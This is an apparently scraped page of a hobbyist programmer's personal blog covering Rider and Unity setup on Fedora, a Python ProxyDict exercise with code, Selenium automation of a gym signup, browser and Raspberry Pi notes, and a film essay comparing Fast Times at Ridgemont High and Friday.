at some incredibly low FPS. (Of course, this is a 2D game without lots of resources, but that’s still encouraging). It wanted me to have VS Code running. I think I also saw that on Flathub, but I decided to see if I could somehow get it to work with Rider in Flatpak form. I launched Rider for the first time and it started off by asking for my preferences. First off was the UI theme: And what kind of hacker would I be if I didn’t go with dark? Then it was time for the color schemes: If I’d used a bunch more Visual Studio, I’d go with the middle selection. I’m a big fan of the Dracula themes I’ve been using in various editors, but I don’t think that’s the same as their Darcula theme since that mentions Intellij. So I just went with Rider Dark. I didn’t have any particular preference here, so I just went with Visual Studio since I figured that would probably match shortcuts that the GameDev.tv guys would use. I decided not to do a Desktop Entry since, a you can see at the top of the next screenshot, it already seemed to have an icon: I don’t have the environment installed for C#. A quick bit of Googling seems to imply that Unity is using Mono for their C#, so I will try and get that installed first. After a bit of searching, I installed the mono-complete package on Fedora.Then it was time to choose Plugins. I didn’t do any featured plugins. Afterwards I chose the free 30 day evaluation (maybe there isn’t a community version like Pycharm?) and decided to open my Block Destroyer project. It didn’t automatically install the Rider Unity plugin, but I blame that partially on flatpak and partially on Fedora. (Everyone assumes Linux Unity dev is on Ubuntu or Centos 7) In the end I couldn’t quite figure out how to connect the two, but I think it’ll be easy enough to just load the files after I create my project. I did test that editing it in Rider will eventually recompile it in Unity once it realizes that the file has changed on disk. So I’m going to give this a shot for that new GameDev.tv class. I’ll report back on whether it’s worth it or if you should just stick to Windows (or Ubuntu) if you’re doing Unity game development. PyGame 2.0 is out! I. Fedora 33 is out! It came out this Tuesday and last night I updated my laptop. The only thing I had to do for the upgrade was remove a python3-test package. Since I’m using virtual environments, for the most part I don’t care which Python packages the system has. So that was a nice, easy upgrade! Good job Fedora packagers and testers! Speaking of Python, it’ll be nice to start upgrading my projects to Python 3.9. (Fedora 33 includes the latest programming language versions as part of its “First” values) Probably the next upgrade will be Scarlett’s laptop since she has a school-provided Chromebook for school. What I’ve been up to in Programming: Python Selenium)) Spent a bunch of today trying to get SSL working correctly And failed and left my site offline most of the day. So I’ll have to try some stuff on the side and give it another shot.. Last Few Days in Programming: Lots of Python Been quite busy with Python, keeping me away from other pursuits, like video games. (Although the kids have been requesting Spelunky 2 whenever it’s time to hang out with them) Extra Life Donation Tracker (eldonationtracker) For my Extra Life Donation Tracker I pushed out a new release, v5.2.2. A user of my program (man, I never get tired of how awesome that is!!) had wholly anonymous donors which was causing an issue I thought I’d handled. But it turns out that the folks that run the Donor Drive API are a little inconsistent in how they handle that in the donor endpoint vs the donations endpoint. So I pushed that fix out and now things should be dandy for game day (about 2 weeks away!!) Automating some Boring Stuff In these COVID-19 times I have a problem – the YMCA where I’m a member has instituted signups for swimming. But you have to sign up EXACTLY 48 hours before you want to swim. Since I’m swimming every other day, that means that sign up time is when I’m swimming. For a while I would just wait until after my swim to sign up. But it’s a VERY popular time. So I started taking my phone to the pool to sign up. There are many negatives to this: - It takes ~5 minutes or so with my phone and LTE connection (out of a 45 minute session which is already shorter than I’d normally spend in there) - It uses data - I risk dropping my phone into the pool or into a pool of water around the pool - It means my phone is right there in my gym bag where someone could steal it (although that would give me a great excuse to buy a new one…) So, while I was swimming today (best source of thoughts other than the shower), I realized I could probably use Selenium to automate this. I’ve never used it before, but I’d heard a lot about it. I knew that Al Sweigart talked about it in his book, Automate the Boring Stuff with Python. I bought a copy of the first edition, but I wanted to make sure I was up to date on the latest stuff so I went to that link I just shared where he has it available to read for free. He’s using the model Corey Doctorow used to use where it’s there for free, but you can also buy it and help him and the publisher. Also, he has a class on Udemy that covers the same topics. Anyway, I spent all morning (literally) digging around in my browser’s inspector mode to get all the data I needed to use it to automate the sign up. I believe I’ve got it working (I’d already signed up for my next swim session, so I had to pretend to sign up for another time, but you can only sign up for one time per day). I set up a cron job and what I’m going to do is let it sign me up and I’ll double-check (safety valve in case it doesn’t work). I’m not ready to share this code at this point – mostly because I’d prefer if it could keep working. However, it was a great experience in debugging and in how web scraping is just as annoying now as when I first learned about it somewhere around 15 years ago with O’Reilly books with titles like “Google Hacking” and “Flickr Hacking”. raspigaragealert As I mentioned in Switching up the hardware for the Garage IOT, I recently moved my Raspberry Pi-powered garage alert software from a Raspberry Pi 1B to a Raspberry Pi Zero W. The Raspberry Pi 1B is now in the office providing temperature and humidity data – quantifying just HOW HOT it is in here. This led me to have a renewed interest in the program. So I went ahead and created another config file in order to make it more generally usable to folks who aren’t me. Then I also created documentation. The documentation still needs a bit more work, but it could help others. Also, since it’s Hacktoberfest, someone made a PR for my code!! If this isn’t the first PR someone’s made against my code in a project in which they were co-authors, it’s at least one of the first. So that’s exciting! Python Morsels Finally, for this time period there was the most recent Python Morsels exercise. I fell a little behind with some other projects (and Spelunky 2) so my most recent assignment was to “create a ProxyDict class which offers an immutable dictionary-like interface that wraps around a given dictionary.” The first bonus was to add support for len, items, values, and get. The second bonus has to implement iteration and a nice repr string. The final bonus had to support equality. At first I was a bit lost. I tried a naive solution where I just passed the keys of the dictionary I received in the __init__ method, but I got stuck on figuring out __getitem__. So then I thought I needed to use abstract base classes. I’d seen them in some book I read in the past few months. But I couldn’t remember what they were called. So I clicked on Trey’s first hint, which showed that I was right and reminded me of the term “abstract base class”. This was not a “gimme” for there was not a Dictionary in collections.abc. So after looking at the table in for a while, I thought Collection would give me a lot of what I wanted. But it was still missing a bit, so I looked at Mapping, which was probably the best thing to use because it was immutable and inherited from Collection. Unlike other problems in Python Morsels, this is a very, very esoteric part of Python, but it was interesting to learn how to implement an ABC; particularly the fact that it will let you know which dunder methods you’re missing when you try to create a class. Turns out that by doing this, I got bonuses 1 and 3 (and part of 2) for free!) As for the __repr__ method – I’m a pro at those at this point. I kept thinking there must be some way to cheat and use the one from the dictionary I was proxying, but I didn’t know how. So) def __repr__(self): center_list = [] for key, value in self.proxy_dictionary.items(): if isinstance(key, int): center_list.append(f"{key}: '{value}'") else: center_list.append(f"'{key}': '{value}'") center = (', '.join(center_list)) return "ProxyDict({"+center+"})" I don’t think I have the prettiest syntax for my repr method. I was trying to be elegant and use a list comprehension. That looked like: center_list = [f"{key}: '{value}'" for key, value in self.proxy_dictionary.items()] center = (', '.join(center_list)) But without using a lamba or something, I couldn’t figure out how to implement the if/else logic in the list comprehension. What I learned from Trey’s Solution First of all, when I said this was an esoteric thing, I wasn’t kidding. There’s actually already a way to do this without any work: from types import MappingProxyType as ProxyDict Thanks mostly to Trey’s problem sets I knew that I wanted to use yield or that I probably wanted to do a generator. So I thought my solution was pretty good. But it turns out there are two simpler ways I could have done it. Since I’m proxying a dict, which already has an iter method, I could have done: def __iter__(self): yield from self.proxy_dictionary or I could have done: def __iter__(self): return iter(self.proxy_dictionary) I actually think the first one is more readable. For the repr I kept thinking there must be some easier way to do this. Because the dictionary already has a repr. But I thought that would result in something like ProxyDict(dict(stuff)); apparently not. Because this is Trey’s solution: def __repr__(self): return f"ProxyDict({repr(self.proxy_dictionary)})" Although, that locks in the class name and causes issues if someone wants to do the same thing with our class. So the better way is: def __repr__(self): return f"{type(self).__name__}({self.proxy_dictionary!r})" the !r is the same as repr(self.proxy_dictionary). Well, time to go check out that Pull Request on raspigaragealert! First 24 Hours with Podcast Republic: Evaluating moving from Doggcatcher to Podcast Republic I’ve been using Doggcatcher for YEARS – ever since I first got a smartphone something like 8 or so years ago. I started using Doggcatcher on Dan’s recommendation. One of the best features it’s had is the ability to speed up podcasts without chipmunking the voice. (I think that came a year or so after I started using it). Recently I’ve been a bit annoyed at Doggcatcher, particularly with podcasts from the EarWolf network (although there may be other networks with the same behavior). Every time Doggcatcher checks for updates, all the episodes from EarWolf will disappear and redownload. Until it is done, I can’t listen to the episode. Neil deGrasse Tyson’s podcast is also annoying in that if a new episode comes out before I’ve finished the previous one, it’ll overwrite it so that I now have two copies of the same file. This makes it more stressful than it needs to be when I’m trying to choose the next podcast to listen to. So I started asking folks for recommendations. Dan recommended Podcast Republic to me. I don’t know if it’ll fix things for me because Dan was using it because Doggcatcher wasn’t working well for him for authenticated feeds, but I’m hopeful. It does have some features that I didn’t know I wanted: being able to sync across devices – would have helped when I changed phones as well as being able to listen on web and sync (not something I’d use a LOT, but might use a bit). So I’m going to try it out and let you know what I think. Brave on Windows Part 1 This post continues a series on exploring new browsers: I’ve been using Vivaldi on Windows for about four months now. As I keep saying, my browser needs on Windows aren’t too huge. Mostly I access youtube, the Stardew Valley Farm uploaded, and Google Docs. But I want to keep checking out new browsers on Windows first precisely since they are so important on my Linux computer. I don’t want to mess up a good thing there. So let’s start off with Brave’s new user tour: Interestingly it doesn’t see Vivaldi as a Browser to import from: Now onto the important part of what makes Brave, Brave: Intelligently they tell you how to turn it off if it’s breaking sites, rather than let users think the browser’s rendering is broken. We’ll see how well it works for the sites I visit – probably just fine on Windows. Now, this I REALLY like. I guess since everyone else either owns search (Google and Microsoft) or gets paid by the search engine (Mozilla getting Google payments) I never see this. But I think this is the type of transparency that browsers should be providing! Not surprising since one of the Brave founders came from Mozilla. Rewards is a weird name for this, since I’m not getting paid or any items. But I do like the idea – you earn tokens that equate to money that gets paid out to the websites you want to support. Here’s a little more about it: I’m not going to sign up now because I don’t really visit enough sites on this computer and I just want to get on with it. Here’s the page I get after that: Now, it may look suspicious to you that it claims to have already blocked some trackers when I’ve only gone through their welcome page. I, too, was suspicious at first. But then I remembered when I imported settings from Chrome, it took me to some Adobe page. So new tabs always look like this. I opened a new tab without doing anything else: Looks like they make money from Cryptocurrencies? However, true to what you’d expect, unlike Vivaldi it doesn’t pre-populate your new tab with a bunch of sponsored sites. In fact, my speed dial still looks exactly the same on Vivaldi. Here’s how the blog looks on Brave: I like the fonts it chooses to render with. It claims to have stopped trackers on my site. I don’t know of any, so I’m going to guess that the “Share This” has some of that embedded as do embedded YouTube videos. Let’s take a quick look at two sites I use that have ads. First Ars Technica: But I guess these things aren’t ads: And a quick look at reddit: There’s definitely an ad missing in that square. Supposedly also 13 ads and trackers. Again. Brave doesn’t seem to have nearly as many widgets as Vivaldi, but that’s not surprising; Vivaldi, like Opera before it is known for being a power user’s browser. I don’t know if this ends up being pro or con for Brave in the long run. It’s a nice clear browser that more or less seems to look and feel like a regular browser – just with supposedly less tracking and ads. To get the same experience as Vivaldi would probably involve lots of potentially dangerous extensions. We’ll see how it handles my day-to-day on Windows. Switching up the hardware for the Garage IOT Back in May, I set up my Raspberry Pi B as my garage door monitor. Unfortunately it stopped working, I haven’t investigated yet, but I wouldn’t be surprised if it got hit with the infamous SD card corruption that was a big problem with the early Raspberry Pi boards. (I think I read it’s much less of a problem with the Raspberry Pi 4) So I decided to go ahead and switch it with a Raspberry Pi Zero W, especially since you can get it with headers from Adafruit for only $14. As a bonus, it’s got a better processor (same as the Raspberry Pi 3, I think) and built-in WiFi. It’s also got a smaller footprint, but that doesn’t matter to me for where it’s mounted. So now I’m back to having a Raspberry Pi B without a job to do (assuming the hardware is fine and it just ended up in an unbootable state. I’ve also now got a usb WiFi module for it, so maybe that’ll help me think of something for it to do. I think the Raspberry Pi rover project I got in a Humble Bundle uses a 1st gen Raspberry Pi, but I’d been thinking of using a 4th gen Pi in order to maybe do some more fun stuff with it like maybe some openCV based Computer Vision and/or machine learning. All Journey and No Destination: Friday and Fast Times at Ridgemont High By complete coincidence I ended up watching Fast Times at Ridgemont High and Friday (each for the first time) back to back this week. I watched Fast Times because it was being covered by Paul Scheer and Amy Nicholson were covering it on Unspooled, their film podcast. As for Friday, well, that’s a slightly more convoluted story. Five Iron Frenzy, one of my most consistently favorite bands, was doing a Kickstarter for their new album. As part of promotion for the campaign, Reese Roper appeared on Mike Herrera’s podcast, The Mike Herrera Podcast. Herrera is the lead singer and songwriter for MxPx, a band I’ve been listening to off-and-on since 1996ish. The Roper episode led me to lookup MxPx’s latest release, MxPx. There’s a song on there called Friday Tonight that had some lyrics that didn’t make sense to me: So I went to genius.com’s page for the song and found out it was this scene from the movie Friday: So I decided to check out the movie. It was an interesting couple of movies to watch back-to-back for the first time. In the first season of the Unspooled podcast they covered the movies on the AFI Top 100 list. For this season they are looking at movies that perhaps should have a place on the list (although the stated fate of the season 2 list is to be sent into space) and are exploring the movies by category. The first category is high school movies. I’d never seen Fast Times at Ridgemont High because it came out when I was too young and, for some reason, I never happened to catch it on Comedy Central, TNT, or any of the other cable channels that used to just show TV edits of movies before they started having shows in their own right. I’m not entirely sure what I was expecting, but from the trailer and various bits of the movie that had become part of the culture/memes/etc, I was expecting a zany film. Or at least a film that operated on the level of reality of Ferris Bueller, which came out four years later. Or maybe something like Grease, but without the music. Instead we got a movie where, when we reached the scene with Spucoli taking a joy ride in the football player’s car, I turned to my wife and asked, “What’s the point of this movie? I’m not getting a plot.” Instead it’s almost a series of vignettes that takes us through an entire school year at Ridgemont High. I learned afterwards (while listening to the podcast) that this is because it was based on a non-fiction book written by a Rolling Stone writer who studied the senior class at a high school. (Incidentally, Mean Girls was also based on a book, but that one ended up having a much more conventional plot) Plot-wise this movie seems to be at least one of the seeds that leads to most of the movies from Kevin Smith’s View-Askew-niverse – particularly Clerks and Mallrats. It also wasn’t nearly as comedic as I thought it would be. There are funny moments, but it’s more of a drama with funny moments – like real life. Mostly we follow Stacy Hamilton (Jennifer Jason Leigh) who puts in an amazing performance as a 15-year-old who falls for the trope of having an unexplained need to lose her virginity; a trope that persisted until the 1990s when we finally started taking AIDS and other STDs seriously. What Ii mean by unexplained need is that Stacy seems not to want sex simply because of her teenage hormones, but more because it seems to be expected in her peer group if she doesn’t want people to consider her a baby. I even remember a Fresh Prince of Belair episode where Carlton is very embarrassed to be a virgin. By contrast, by the time I was in High School in the last 90s there wasn’t really any pressure to graduate without one’s virginity. It was more of a personal choice that people made – at least among my non-church peers. They’d been scaring us about STDs and the almost 100% chance of teenage pregnancy for so long that I was shocked when, as a married man, we didn’t get a baby on the first try. Anyway, her arc ends up being the most realistic movie depiction I’ve ever seen of the disappointment of teenage sex from the girl’s point of view. (The podcast clarified this was one of the director’s messages) First attempt is the famous dugout scene. Second attempt, she gets thwarted in a humiliating way. Third attempt, the dude is a one-minute man. By contrast, movie sex is usually from a male perspective. I also loved the way she handled talking to Damone once she got pregnant, not taking his attempt to shift blame onto her. “No, take that back.” Man, that was really great writing of a strong character. A different writer might have made her cave there, but Stacy isn’t playing victim, she’s just trying to get Damone to be fair by paying for his part in it. That’s the clearest arc in the movie. Jeff Spicoli (Sean Penn) is merely comic relief. Linda Barrett (Phoebe Cates) is simply there to give bad advice to Stacy. Mark Ratner (Brian Backer) seems like he’s going to be the main character, but he’s mostly just a foil to Damone (Robert Romanus) and a second attempt at sex for Stacy. And Brad Hamilton (Judge Reinhold) is almost certainly the basis of Kevin Smith’s long-suffering Dante Hicks (Clerks and Clerks 2). Despite a good work ethic, capitalism just beats him down over and over throughout the film. None of of the usual plots are in evidence – no one is in danger of not graduating (maybe Spicoli is, but he’s merely a comedic element, not a real character), no one is trying to get into the big party, no male or female is in a “she cleans up nicely” trope, even Ratner isn’t trying very hard to get with Stacy. Yet, somehow this movie really hits for me. Perhaps it’s the more documentary-ish story telling due to it being based on a book. In the hands of our director (the same director of Clueless), the characters and situations aren’t heightened. As someone who worked in high school (selling shoes, as a lifeguard, in a movie theatre, and a bank teller), that aspect of the story really worked for me compared to the newer movies where the kids just have cash without needing to do anything for it. A few odds and ends before moving on to Friday: I have to give kudos to the to the set designer for selecting oversized chairs in the restaurant during Ratner and Stacy’s date. They look ridiculously oversized, emphasizing that they are kids playing at being adults. My wife and I are fond of remarking on something we’ve noticed in movies from the late 70s and through the 80s (and I’m pretty sure I’ve mentioned it on the blog at some point). Movies from that time period will inevitably have precocious kids using profanity (the “worse” the word, the “funnier” it seems) and you will see lots of gratuitous breasts. Fast Times at Ridgemont High is no exception. (Judge Reinhold’s fantasy is completely without consequence to the plot). During the Unspooled episode about the movie, the director mentioned that during the 80s, the amount of breast shots required in a movie was a requirement for securing financing for the movie. So it’s not just something we’ve noticed, it’s an actual thing that was going on. (Frankly, on seeing how things were handled in Fast Times at Ridgemont High with bare breasts, I’m surprised we don’t end up seeing Cameron naked in Ferris Bueller) Speaking of nudity, the director mentioned that during a screening, in the scene where Damone and Stacy have sex – she originally wanted to show full frontal nudity of Damone becuase there was already a bunch of full frontal female nudity in rated R movies at the time. She was told no because the male anatomy is automatically an aggressive organ while a female is passive, so it would have been rated X. Of course, the sad part, thanks to Hollywood being so silly that we have the term Hollywood-ugly to describe someone that the characters consider ugly but who is beautiful by normal standards, during a preview screening someone yelled out “fat chick” at Stacy’s naked body. I’m going to link to the image (rather than posting it in this post) in order to keep this post safe for work. (SO This LINK IS NOT SAFE FOR WORK) Yeah, I noticed that I was surprised Hollywood let a woman look like that in a movie, but she is definitely NOT fat. One last thing – does Stacy’s boyfriend in Chicago exist? I thought he didn’t until she started crying at the end of the movie because he wasn’t coming to graduation. My wife thought he was real. Paul Scheer was sure he was fake and Amy Nicholson thought he was real, but was maybe convinced by the end of the podcast that he wasn’t. While Fast Times at Ridgemont High takes place over a school year, Friday takes place over the course of one day. My wife had seen it enough times to be able to quote lines as they were happening. I never saw it because it was rated R and my parents were very strict about seeing movies rated higher than our ages. And later I was into very different movies, so I never thought about it until MxPx brought it back to my attention. Interestingly, even though both of these movies ostensibly are without traditional plot structures, this movie just didn’t quite do it for me as well as Fast Times at Ridgemont High did. Perhaps this is because Friday only takes place over the course of one day, so there isn’t even a character progression. Yet Ferris Bueller also takes place over a single day. I think the big difference is that Bueller and friends are out on an illicit adventure (and, near the end, the need to avoid getting caught) while Ice Cube and the rest of the cast are simply sitting outside. Perhaps a more successful movie for me would have involved Ice Cube and Chris Tucker sitting outside for a normal day only to end up dragged on some sort of quest or to have things go insanely wrong. Instead, there are only two desires our main characters have. Chris Tucker wants to get Ice Cube high for the first time. This is accomplished midway through the movie and doesn’t have any consequences. He doesn’t do anything or cause anything to happen from being high – it doesn’t even mess up Ice Cube’s chances with the girl across the street. And that’s his desire, but it’s not as though he is a nerd who’s never had a girl – he CURRENTLY has a girlfriend. (Although, for all her protesting at Ice Cube interacting with other women, my wife noticed that she has a guy in her bed when she called Ice Cube on the phone). Instead we get an SNL skit-like day where the same folks keep stopping by over and over. Why isn’t anyone working or in school? I was at a loss to figure out what age anyone was supposed to be, partially because Hollywood tends to cast way older (something they’ve started to fix), afterall, except for Jennifer Jason Leigh, no one in Fast Times at Ridgemont High looks like they belong in High School. Well, one potential plotline could have been the fact that Ice Cube lost his job because there is video footage of him stealing. Ice Cube says the guy in the video isn’t him. A few characters say different things about the robbery, but by the time the movie is done, I have no idea whether or not it was him. A different movie could have had him proving that it wasn’t him or trying to get another job and either succeeding or failing in comedic ways. But this paragraph is where I state something I’ve been thinking of as I’ve worked on this essay a little at a time over the past week. Maybe all of this makes sense if you grew up in a neighborhood like the one in the movie? Maybe there are some people for whom the plot – with some folks just sitting on the porch and others stopping by over and over makes sense. But for me it just fell flat when combined with the lack of a traditional plot motivation for any of the characters. It also seemed to take a wild swing at the end when it went from a mostly goofy movie to DEADLY serious when Zeus gives Felicia a black eye and then hits the girl Ice Cube would like to get with. It’s suddenly about whether shooting a gun is worth it. And while we did literally have Chekhov’s Gun, it was some real tonal whiplash. Then again, I remember some Fresh Prince of Bel-Air episodes doing that, too. So maybe it’s just an expected trope. A couple stray thoughts: I finally got to see the origin of the meme “Bye Felicia”. However, the character of Felicia didn’t make sense to me. Throughout the first ¾ of the movie she appears at Ice Cube’s house asking to borrow things that don’t make sense to borrow – like a microwave. She looks and acts like she’s probably a homeless addict. Yet, near the end you find out that she’s the sister of the girl Ice Cube has been after. So, does this mean she’s just mentally ill? And if she is, does that make all the jokes at her expense worse? (Although my question does imply it’s OK to laugh at an addict. But we do have a male character who’s a homeless addict who is 100% just played for laughs) Why is Bernie Mac a shady preacher both in this movie and a shady judge in Booty Call? Was it part of his standup at the time or is he just really good at that role? In the end, I think it’s interesting that I watched both of these cultural touchstone movies back-to-back without any foreknowledge of the plot and they both happened to be movies without traditional plot structures. Fast Times at Ridgemont High turned out to be really enjoyable while Friday turned out to be a dud for me. The next episode of Unspooled is going to be Dazed and Confused, but I don’t know if it’ll merit a blog post on its own. Time will tell. Last few weeks in Programming: Python, Ruby You”. Review: InvestiGators My rating: 4 of 5 stars Read this to my four-year-olds and I found it to be a blast. Most of the word-play went over their heads. In fact, after finishing it with my four-year-olds, I recommended it to my 8-year-old. We’ll see what she thinks. This is definitely one of those books you can read with the kids and, if you like Dad Jokes and Puns, you’ll be enjoying it rather than wishing you were doing something else. View all my reviews
http://www.ericsbinaryworld.com/page/4/
CC-MAIN-2021-10
refinedweb
6,582
76.86
About the Open XML SDK 2.5 for Office Last modified: August 23, 2012 Applies to: Office 2013 | Open XML In this article Structure of an Open XML Package Open XML SDK 1.0 Open XML SDK 2.0 for Microsoft Office Open XML SDK 2.5 for Office Open XML is an open standard for word-processing documents, presentations, and spreadsheets that can be freely implemented by multiple applications on different platforms. Open XML is designed to faithfully represent existing word-processing documents, presentations, and spreadsheets that are encoded in binary formats defined by Microsoft Office applications. The reason for Open XML is simple: billions of documents now exist but, unfortunately, the information in those documents is tightly coupled with the programs that created them. The purpose of the Open XML standard is to de-couple documents created by Microsoft Office applications so that they can be manipulated by other applications independent of proprietary formats and without the loss of data. An Open XML file is stored in a ZIP archive for packaging and compression. You can view the structure of any Open XML file using a ZIP viewer. An Open XML document is built of multiple document parts. The relationships between the parts are themselves stored in document parts. The ZIP format supports random access to each part. For example, an application can move a slide from one presentation to another presentation without parsing the slide content. Likewise, an application can strip all of the comments out of a word processing document without parsing any of its contents. The document parts in an Open XML package are created as XML markup. Because XML is structured plain text, you can view the contents of a document part using text readers or you can parse the contents using processes such as XPath. Structurally, an Open XML. Word processing documents are described by using WordprocessingML markup. For more information, see Working with WordprocessingML documents (Open XML SDK). A WordprocessingML document is composed of a collection of stories where each story is one of the following: Main document (the only required story) Glossary document Header and footer Text box Footnote and endnote Presentations are described by using PresentationML markup. For more information, see Working with PresentationML documents (Open XML SDK). Presentation packages can contain the following document parts: Slide master Notes master Handout master Slide layout Notes Spreadsheet workbooks are described by using SpreadsheetML markup. For more information, see Working with SpreadsheetML documents (Open XML SDK). Workbook packages can contain: Workbook part (required part) One or more worksheets Charts Tables Custom XML Version 1 of the Open XML SDK simplified the manipulation of Open XML packages. The Open XML SDK Application Programming Interface (API) encapsulates many of the common tasks that you typically perform on Open XML. The Open XML SDK 2.0 for Microsoft Office extended the strongly typed class support from the part classes, which are provided in version 1.0, to the XML content in each part. All functions available in version 1.0 are still supported. With version 2.0, you are able to program against the XML content inside the part. The SDK supports programming in the style of LINQ to XML which makes coding against the XML content much easier than the traditional W3C XML DOM programming model. The SDK supports the following common tasks/scenarios: Strongly Typed Classes and Objects—Instead of relying on generic XML functionality to manipulate XML, which requires that you be aware of element/attribute/value spelling as well as namespaces, you can use the Open XML SDK to accomplish the same solution simply by manipulating objects that represent elements/attributes/values. All schema types are represented as strongly typed Common Language Runtime (CLR) classes and all attribute values as enumerations. Content Construction, Search, and Manipulation—The LINQ technology is built directly into the SDK. As a result, you are able to perform functional constructs and lambda expression queries directly on objects representing Open XML elements. In addition, the SDK allows you to easily traverse and manipulate content by providing support for collections of objects, like tables and paragraphs. Validation—The Open XML SDK 2.0 for Microsoft Office provides validation functionality, enabling you to validate Open XML documents against different variations of the Open XML Format. The Open XML SDK 2.5 provides the namespaces and members to support the Microsoft Office 2013. The Open XML SDK 2.5 can also read ISO/IEC 29500 Strict Format files. The Strict format is a subset of the Transitional format that does not include legacy features – this makes it theoretically easier for a new implementer to support since it has a smaller technical footprint. The SDK supports the following common tasks/scenarios: Support of Office 2013 Preview file format—In addition to the Open XML SDK 2.0 for Microsoft Office classes, Open XML SDK 2.5 provides new classes that enable you to write and build applications to manipulate Open XML file extensions of the new Office 2013 features. Reads ISO Strict Document File—Open XML SDK 2.5 can read ISO/IEC 29500 Strict Format files. When the Open XML SDK 2.5 API opens a Strict Format file, each Open XML part in the file is loaded to an OpenXmlPart class of the Open XML SDK 2.5 by mapping namespaces to the corresponding namespaces. Fixes to the Open XML SDK 2.0 for Microsoft Office—Open XML SDK 2.5 includes fixes to known issues in the Open XML SDK 2.0 for Microsoft Office. These include lost whitespaces in PowerPoint presentations and an issue with the Custom UI in Word documents where a specified argument was reported as being out of the range of valid values. You can find more information about these and other new features of the Open XML SDK 2.5 in the What's new in the Open XML SDK 2.5 for Office article.
https://msdn.microsoft.com/en-us/library/bb456487(v=office.15)
CC-MAIN-2016-07
refinedweb
992
55.84
So I finally finished compiling my code and it has no errors; however, once I run it it crashes with this error: java.lang.NullPointerException at CanadianGeography.main(CanadianGeography.java:23):271) This is the code for the program: I looked at line 23, but I don't understand what the error is or how to fix it. Can someone help?I looked at line 23, but I don't understand what the error is or how to fix it. Can someone help?Code: import java.awt.*; import hsa.Console; public class CanadianGeography { static Console c; //output console public static void main (String [] args) { new Console (); double finalscore, right, wrong; int score; String prov, cap; /*include x as an empty spot so index starts at 1*/ String [] provanswers = {"x", "Alberta", "Saskatchewan", "Manitoba", "Ontario", "Quebec", "Newfoundland an Labrador", "New Brunswick", "Prince Edward Island", "Nova Scotia"}; String [] capanswers = {"x", "Edmonton", "Regina", "Winnipeg","Ottawa", "Quebec City","St.John's", "Fredericton", "Charlottetown", "Halifax"}; score = 0; /*prompt user and check answer*/ c.println ("What is the province farthest to the west?"); prov = c.readString (); c.println ("What is the name of the capital there?"); cap = c.readString (); if (prov == "British Colombia" & cap == "Victoria") { score = score + 1; //incriment the score if the answer is right } else { score = score + 0;//add zero to the score if the question is wrong } /*loop questions for the other provinces*/ for (int i= 1; i < 11; i++) { c.println ("What is the next province east to it?"); prov = c.readString (); c.println ("What is the name of the capital there?"); cap = c.readString (); /*check answer for province and capital*/ if (prov == provanswers [i] && cap == capanswers [i]) { score = score + 1; } else { score = score + 0;//add zero to the score if the question is wrong } }//end of loop /*tabulate score*/ wrong = 20 - score; right = score - wrong; finalscore = score/20; c.println ("You got" + wrong + "wrong, and " + right + "right out of 20."); if (score <= 0.50) { c.println ("Not enough to pass. Try again."); } else if (score >= 0.90) { c.println ("You are the most brilliant person in the world"); } else if (score >50 && score <90) { c.println ("Good"); } }//end of main method }//end of class
http://forums.codeguru.com/printthread.php?t=534413&pp=15&page=1
CC-MAIN-2014-52
refinedweb
362
72.56
p0f 0.1.0 API client for p0f3 This is a simple API client for p0f3, available at . It is not compatible with version 2.x or 1.x. Start p0f with -s path/to/unix_socket option. Basic usage: from p0f import P0f, P0fException data = None p0f = P0f("p0f.sock") # point this to socket defined with "-s" argument. try: data = p0f.get_info("192.168.0.1") except P0fException, e: # Invalid query was sent to p0f. Maybe the API has changed? print e except KeyError, e: # No data is available for this IP address. print e except ValueError, e: # p0f returned invalid constant values. Maybe the API has changed? print e if data: print "First seen:", data["first_seen"] print "Last seen:", data["last_seen"] Django integration See examples/django_models.py for complete Django model of the data returned by p0f. Django middleware is available in p0f.django.middleware. To use, add P0FSOCKET = "path/to/p0f_unix_socket" to your project’s settings.py, and p0f.django.middleware.P0fMiddleware to MIDDLEWARE_CLASSES. The middleware adds p0f attribute to all incoming requests. request.p0f is None if connection to p0f failed or p0f did not return data for remote IP address. Data fields Parts of these descriptions are shamelessly copied from : By default, following fields are parsed: - datetime: first_seen - datetime: last_seen - timedelta: uptime - int: uptime_sec - timedelta: up_mod_days - datetime: last_nat - datetime: last_chg Additionally, bad_sw and os_match_q are validated. “ValueError” is raised, if incorrect value is encountered. For all empty fields, None is used instead of empty strings or constants: - uptime_min - uptime_sec - uptime - up_mod_days - last_nat - last_chg - distance - bad_sw - os_name - os_flavor - http_flavor - link_type - language This parsing and validation can be disabled with p0f.get_info("192.168.0.1", True) Full descriptions of the fields: - int: first_seen - unix time (seconds) of first observation of the host. - int: last_seen - unix time (seconds) of most recent traffic. - int: total_conn - total number of connections seen. - int: uptime_min - calculated system uptime, in minutes. Zero if not known. - int: up_mod_days - uptime wrap-around interval, in days. - int: last_nat - time of the most recent detection of IP sharing (NAT, load balancing, proxying). Zero if never detected. - int: last_chg - time of the most recent individual OS mismatch (e.g., due to multiboot or IP reuse). - int: distance - system distance (derived from TTL; -1 if no data). - int: bad_sw - p0f thinks the User-Agent or Server strings aren’t accurate. The value of 1 means OS difference (possibly due to proxying), while 2 means an outright mismatch. NOTE: If User-Agent is not present at all, this value stays at 0. - int: os_match_q - OS match quality: 0 for a normal match; 1 for fuzzy (e.g., TTL or DF difference); 2 for a generic signature; and 3 for both. - string: os_name - Name of the most recent positively matched OS. If OS not known, os_name is empty string. NOTE: If the host is first seen using an known system and then switches to an unknown one, this field is not reset. - string: os_flavor - OS version. May be empty if no data. - string: http_name - most recent positively identified HTTP application (e.g. ‘Firefox’). - string: http_flavor - version of the HTTP application, if any. - string: link_type - network link type, if recognized. - string: language - system language, if recognized. - Downloads (All Versions): - 8 downloads in the last day - 119 downloads in the last week - 550 downloads in the last month - Author: Olli Jarva - Bug Tracker: - Download URL: - Keywords: p0f fingerprinting API client - License: MIT - Categories - Package Index Owner: Olli.Jarva - DOAP record: p0f-0.1.0.xml
https://pypi.python.org/pypi/p0f/0.1.0
CC-MAIN-2015-27
refinedweb
582
60.51
